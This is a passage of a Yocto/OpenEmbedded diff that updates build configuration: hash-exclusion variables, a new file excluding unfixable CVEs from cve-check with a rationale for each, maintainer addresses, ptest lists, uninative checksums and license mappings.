@@ -874,8 +882,8 @@ BB_CONSOLELOG ?= "${LOG_DIR}/cooker/${MACHINE}/${DATETIME}.log"
# Setup our default hash policy
BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
- SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+BB_HASHEXCLUDE_COMMON ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
+ THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
STAMPS_DIR PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_NOHASHDIR LICENSE_PATH SDKPKGSUFFIX \
@@ -883,12 +891,13 @@ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DI
BB_WORKERCONTEXT BB_LIMITEDDEPS BB_UNIHASH extend_recipe_sysroot DEPLOY_DIR \
SSTATE_HASHEQUIV_METHOD SSTATE_HASHEQUIV_REPORT_TASKDATA \
SSTATE_HASHEQUIV_OWNER CCACHE_TOP_DIR BB_HASHSERVE GIT_CEILING_DIRECTORIES"
-BB_HASHCONFIG_WHITELIST ?= "${BB_HASHBASE_WHITELIST} DATE TIME SSH_AGENT_PID \
+BB_HASHBASE_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} PSEUDO_IGNORE_PATHS BUILDHISTORY_DIR SSTATE_DIR "
+BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
SSH_AUTH_SOCK PSEUDO_BUILD BB_ENV_EXTRAWHITE DISABLE_SANITY_CHECKS \
PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
- BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT"
+ BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
file-checksums python func task export unexport noexec nostamp dirs cleandirs \
diff --git a/meta/conf/distro/include/cve-extra-exclusions.inc b/meta/conf/distro/include/cve-extra-exclusions.inc
new file mode 100644
index 0000000000..f3490db9dd
--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
+# This file contains a list of CVE's where resolution has proven to be impractical
+# or there is no reasonable action the Yocto Project can take to resolve the issue.
+# It contains all the information we are aware of about an issue and analysis about
+# why we believe it can't be fixed/handled. Additional information is welcome through
+# patches to the file.
+#
+# Include this file in your local.conf or distro.conf to exclude these CVE's
+# from the cve-check results or add to the bitbake command with:
+# -R conf/distro/include/cve-extra-exclusions.inc
+#
+# The file is not included by default since users should review this data to ensure
+# it matches their expectations and usage of the project.
+#
+# We may also include "in-flight" information about current/ongoing CVE work with
+# the aim of sharing that work and ensuring we don't duplicate it.
+#
+
+
+# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
+# CVE is more than 20 years old with no resolution evident
+# broken links in CVE database references make resolution impractical
+CVE_CHECK_WHITELIST += "CVE-2000-0006"
+
+# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
+# The issue here is spoofing of domain names using characters from other character sets.
+# There has been much discussion amongst the epiphany and webkit developers and
+# whilst there are improvements about how domains are handled and displayed to the user
+# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
+# problem. Whitelisted as there isn't any mitigation or fix or way to progress this further
+# we can seem to take.
+CVE_CHECK_WHITELIST += "CVE-2005-0238"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
+# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
+# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
+# Upstream don't see it as a security issue, ftp servers shouldn't be passing
+# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
+CVE_CHECK_WHITELIST += "CVE-2010-4756"
+
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
+# The encoding/xml package in go can potentially be used for security exploits if not used correctly
+# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
+# exposing this interface in an exploitable way
+CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
+
+# db
+# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
+# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
+CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
+CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
+CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
+CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
+CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
+# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
+# qemu maintainers say the patch is incorrect and should not be applied
+# Ignore from OE's perspectivee as the issue is of low impact, at worst sitting in an infinite loop rather than exploitable
+CVE_CHECK_WHITELIST += "CVE-2021-20255"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
+# There was a proposed patch but rejected by upstream qemu. It is unclear if the issue can
+# still be reproduced or where exactly any bug is.
+# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
+CVE_CHECK_WHITELIST += "CVE-2019-12067"
+
+# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
+# It is a fuzzing related buffer overflow. It is of low impact since most devices
+# wouldn't expose an assembler. The upstream is inactive and there is little to be
+# done about the bug, ignore from an OE perspective.
+CVE_CHECK_WHITELIST += "CVE-2020-18974"
+
+
+
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..038acc1504 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
# The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
# fetch from the network (and warn you if not). To disable the test set
# the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
-CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
+CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
#
# Please submit any patches against recipes in meta to the
# OE-Core mail list (openembedded-core@lists.openembedded.org)
-# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org)
+# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
#
# If you have problems with or questions about a particular recipe, feel
# free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
-RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
-RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>"
+RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
-RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-lzop = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-m4 = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-m4-native = "Robert Yang <liezhi.yang@windriver.com>"
RECIPE_MAINTAINER_pn-make = "Robert Yang <liezhi.yang@windriver.com>"
@@ -501,7 +501,7 @@ RECIPE_MAINTAINER_pn-mpeg2dec = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-mpfr = "Khem Raj <raj.khem@gmail.com>"
RECIPE_MAINTAINER_pn-mpg123 = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-msmtp = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-mtd-utils = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-mtdev = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-mtools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-musl = "Khem Raj <raj.khem@gmail.com>"
@@ -545,7 +545,7 @@ RECIPE_MAINTAINER_pn-pango = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-parted = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patch = "Hongxu Jia <hongxu.jia@windriver.com>"
RECIPE_MAINTAINER_pn-patchelf = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-pbzip2 = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-pciutils = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-pcmanfm = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-perf = "Bruce Ashfield <bruce.ashfield@gmail.com>"
@@ -576,6 +576,7 @@ RECIPE_MAINTAINER_pn-python3 = "Oleksandr Kravchuk <open.source@oleksandr-kravch
RECIPE_MAINTAINER_pn-python3-async = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-dbus = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
RECIPE_MAINTAINER_pn-python3-docutils = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
+RECIPE_MAINTAINER_pn-python3-dtschema-wrapper = "Bruce Ashfield <bruce.ashfield@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodome = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-pycryptodomex = "Joshua Watt <JPEWhacker@gmail.com>"
RECIPE_MAINTAINER_pn-python3-extras = "Oleksandr Kravchuk <open.source@oleksandr-kravchuk.com>"
@@ -661,9 +662,9 @@ RECIPE_MAINTAINER_pn-systemd-conf = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-compat-units = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-serialgetty = "Chen Qi <Qi.Chen@windriver.com>"
RECIPE_MAINTAINER_pn-systemd-systemctl-native = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <kamensky@cisco.com>"
-RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <kamensky@cisco.com>"
+RECIPE_MAINTAINER_pn-systemtap = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-native = "Victor Kamensky <victor.kamensky7@gmail.com>"
+RECIPE_MAINTAINER_pn-systemtap-uprobes = "Victor Kamensky <victor.kamensky7@gmail.com>"
RECIPE_MAINTAINER_pn-sysvinit = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-sysvinit-inittab = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-taglib = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -685,7 +686,7 @@ RECIPE_MAINTAINER_pn-udev-extraconf = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unfs3 = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-unifdef = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-uninative-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-unzip = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-update-rc.d = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-usbinit = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-usbutils = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -706,11 +707,11 @@ RECIPE_MAINTAINER_pn-vulkan-tools = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-waffle = "Ross Burton <ross.burton@arm.com>"
RECIPE_MAINTAINER_pn-watchdog = "Alexander Kanavin <alex.kanavin@gmail.com>"
RECIPE_MAINTAINER_pn-watchdog-config = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-wayland = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-wayland-protocols = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-webkitgtk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-weston = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-weston-init = "Denys Dmytriyenko <denys@denix.org>"
RECIPE_MAINTAINER_pn-wget = "Yi Zhao <yi.zhao@windriver.com>"
RECIPE_MAINTAINER_pn-which = "Anuj Mittal <anuj.mittal@intel.com>"
RECIPE_MAINTAINER_pn-wic-tools = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -764,6 +765,6 @@ RECIPE_MAINTAINER_pn-xtrans = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xuser-account = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xvinfo = "Armin Kuster <akuster808@gmail.com>"
RECIPE_MAINTAINER_pn-xwininfo = "Armin Kuster <akuster808@gmail.com>"
-RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-xz = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zip = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-zlib = "Denys Dmytriyenko <denys@denix.org>"
diff --git a/meta/conf/distro/include/ptest-packagelists.inc b/meta/conf/distro/include/ptest-packagelists.inc
index c13ff724b1..3fb7ec2657 100644
--- a/meta/conf/distro/include/ptest-packagelists.inc
+++ b/meta/conf/distro/include/ptest-packagelists.inc
@@ -26,6 +26,7 @@ PTESTS_FAST = "\
liberror-perl-ptest \
libmodule-build-perl-ptest \
libpcre-ptest \
+ libpng-ptest \
libtimedate-perl-ptest \
libtest-needs-perl-ptest \
liburi-perl-ptest \
@@ -60,6 +61,7 @@ PTESTS_FAST = "\
# bash-ptest \ # Test outcomes are non-deterministic by design
# ifupdown-ptest \ # Tested separately in lib/oeqa/selftest/cases/imagefeatures.py
# mdadm-ptest \ # Tests rely on non-deterministic sleep() amounts
+# libinput-ptest \ # Tests need an unloaded system to be reliable
#"
PTESTS_SLOW = "\
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 69b6edee5f..4ac66fd506 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -6,9 +6,10 @@
# to the distro running on the build machine.
#
-UNINATIVE_MAXGLIBCVERSION = "2.32"
+UNINATIVE_MAXGLIBCVERSION = "2.39"
+UNINATIVE_VERSION = "4.4"
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/2.9/"
-UNINATIVE_CHECKSUM[aarch64] ?= "9f25a667aee225b1dd65c4aea73e01983e825b1cb9b56937932a1ee328b45f81"
-UNINATIVE_CHECKSUM[i686] ?= "cae5d73245d95b07cf133b780ba3f6c8d0adca3ffc4e7e7fab999961d5e24d36"
-UNINATIVE_CHECKSUM[x86_64] ?= "d07916b95c419c81541a19c8ef0ed8cbd78ae18437ff28a4c8a60ef40518e423"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
+UNINATIVE_CHECKSUM[aarch64] ?= "b61876130f494f75092f21086b4a64ea5fb064045769bf1d32e9cb6af17ea8ec"
+UNINATIVE_CHECKSUM[i686] ?= "9f28627828f0082cc0344eede4d9a861a9a064bfa8f36e072e46212f0fe45fcc"
+UNINATIVE_CHECKSUM[x86_64] ?= "d81c54284be2bb886931fc87281d58177a2cd381cf99d1981f8923039a72a302"
diff --git a/meta/conf/layer.conf b/meta/conf/layer.conf
index 0249f21d07..7453655417 100644
--- a/meta/conf/layer.conf
+++ b/meta/conf/layer.conf
@@ -100,4 +100,6 @@ SSTATE_EXCLUDEDEPS_SYSROOT += "\
SSTATE_EXCLUDEDEPS_SYSROOT += ".*->autoconf-archive-native"
# We need to keep bitbake tools in PATH
-PATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}:${HOSTTOOLS_DIR}"
+# Avoid empty path entries
+BITBAKEPATH := "${@os.path.dirname(bb.utils.which(d.getVar('PATH'),'bitbake'))}"
+PATH := "${@'${BITBAKEPATH}:' if '${BITBAKEPATH}' != '' else ''}${HOSTTOOLS_DIR}"
diff --git a/meta/conf/licenses.conf b/meta/conf/licenses.conf
index 5b309eb385..c78823e847 100644
--- a/meta/conf/licenses.conf
+++ b/meta/conf/licenses.conf
@@ -13,24 +13,39 @@
SPDXLICENSEMAP[AGPL-3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3] = "AGPL-3.0"
SPDXLICENSEMAP[AGPLv3.0] = "AGPL-3.0"
+SPDXLICENSEMAP[AGPL-3.0-only] = "AGPL-3.0"
# GPL variations
SPDXLICENSEMAP[GPL-1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1] = "GPL-1.0"
SPDXLICENSEMAP[GPLv1.0] = "GPL-1.0"
+SPDXLICENSEMAP[GPL-1.0-only] = "GPL-1.0"
SPDXLICENSEMAP[GPL-2] = "GPL-2.0"
SPDXLICENSEMAP[GPLv2] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2+] = "GPL-2.0+"
SPDXLICENSEMAP[GPLv2.0] = "GPL-2.0"
+SPDXLICENSEMAP[GPLv2.0+] = "GPL-2.0+"
+SPDXLICENSEMAP[GPL-2.0-only] = "GPL-2.0"
SPDXLICENSEMAP[GPL-3] = "GPL-3.0"
SPDXLICENSEMAP[GPLv3] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3+] = "GPL-3.0+"
SPDXLICENSEMAP[GPLv3.0] = "GPL-3.0"
+SPDXLICENSEMAP[GPLv3.0+] = "GPL-3.0+"
+SPDXLICENSEMAP[GPL-3.0-only] = "GPL-3.0"
#LGPL variations
SPDXLICENSEMAP[LGPLv2] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2+] = "LGPL-2.0+"
SPDXLICENSEMAP[LGPLv2.0] = "LGPL-2.0"
+SPDXLICENSEMAP[LGPLv2.0+] = "LGPL-2.0+"
+SPDXLICENSEMAP[LGPL-2.0-only] = "LGPL-2.0"
SPDXLICENSEMAP[LGPL2.1] = "LGPL-2.1"
SPDXLICENSEMAP[LGPLv2.1] = "LGPL-2.1"
+SPDXLICENSEMAP[LGPLv2.1+] = "LGPL-2.1+"
+SPDXLICENSEMAP[LGPL-2.1-only] = "LGPL-2.1"
SPDXLICENSEMAP[LGPLv3] = "LGPL-3.0"
+SPDXLICENSEMAP[LGPLv3+] = "LGPL-3.0+"
+SPDXLICENSEMAP[LGPL-3.0-only] = "LGPL-3.0"
#MPL variations
SPDXLICENSEMAP[MPL-1] = "MPL-1.0"
diff --git a/meta/conf/local.conf.sample b/meta/conf/local.conf.sample
index 783d2c4c16..e1a6be3935 100644
--- a/meta/conf/local.conf.sample
+++ b/meta/conf/local.conf.sample
@@ -167,7 +167,7 @@ PATCHRESOLVE = "noop"
#
# Monitor the disk space during the build. If there is less that 1GB of space or less
# than 100K inodes in any key build location (TMPDIR, DL_DIR, SSTATE_DIR), gracefully
-# shutdown the build. If there is less that 100MB or 1K inodes, perform a hard abort
+# shutdown the build. If there is less than 100MB or 1K inodes, perform a hard abort
# of the build. The reason for this is that running completely out of space can corrupt
# files and damages the build in ways which may not be easily recoverable.
# It's necesary to monitor /tmp, if there is no space left the build will fail
@@ -185,7 +185,7 @@ BB_DISKMON_DIRS ??= "\
#
# Shared-state files from other locations
#
-# As mentioned above, shared state files are prebuilt cache data objects which can
+# As mentioned above, shared state files are prebuilt cache data objects which can be
# used to accelerate build time. This variable can be used to configure the system
# to search other mirror locations for these objects before it builds the data itself.
#
diff --git a/meta/conf/local.conf.sample.extended b/meta/conf/local.conf.sample.extended
index 443b4e83f9..3d9cecbc62 100644
--- a/meta/conf/local.conf.sample.extended
+++ b/meta/conf/local.conf.sample.extended
@@ -334,7 +334,7 @@
# The INITRAMFS_IMAGE image variable will cause an additional recipe to
# be built as a dependency to the what ever rootfs recipe you might be
# using such as core-image-sato. The initramfs might be needed for
-# the initial boot of of the target system such as to load kernel
+# the initial boot of the target system such as to load kernel
# modules prior to mounting the root file system.
#
# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -374,23 +374,12 @@
#
#
-# Use busybox/mdev for system initialization
+# System initialization
#
-#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
-#VIRTUAL-RUNTIME_login_manager = "busybox"
-#VIRTUAL-RUNTIME_init_manager = "busybox"
-#VIRTUAL-RUNTIME_initscripts = "initscripts"
-#VIRTUAL-RUNTIME_keymaps = "keymaps"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-
-#
-# Use systemd for system initialization
-#
-#DISTRO_FEATURES_append = " systemd"
-#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
-#VIRTUAL-RUNTIME_login_manager = "shadow-base"
